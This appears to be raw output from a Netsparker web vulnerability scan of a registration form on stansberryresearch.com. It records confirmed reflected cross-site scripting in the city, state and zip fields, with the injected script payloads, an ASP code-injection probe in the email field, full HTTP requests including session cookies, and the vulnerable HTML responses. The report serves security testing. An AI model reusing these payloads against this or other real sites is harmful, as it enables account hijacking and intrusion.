<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

http://www.stansberryresearch.com/forms/palConference.asp?error=email

Parameters

Parameter Type Value
error GET email
city POST '"--></style></script><script>alert(0x0056CE)</script>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:55:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20132
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="''"--></style></script><script>netsparker(0x0056CE)</script>">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

http://www.stansberryresearch.com/forms/palConference.asp?error=email

Parameters

Parameter Type Value
error GET email
state_ POST '"--></style></script><script>alert(0x0056CF)</script>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:55:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20191
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="''"--></style></script><script>netsparker(0x0056CF)</script>">''"--></style></script><script>netsparker(0x0056CF)</script></option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left&qu..
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

http://www.stansberryresearch.com/forms/palConference.asp?error=email

Parameters

Parameter Type Value
error GET email
zip POST '"--></style></script><script>alert(0x0056D1)</script>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:55:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20132
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="''"--></style></script><script>netsparker(0x0056D1)</script>">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
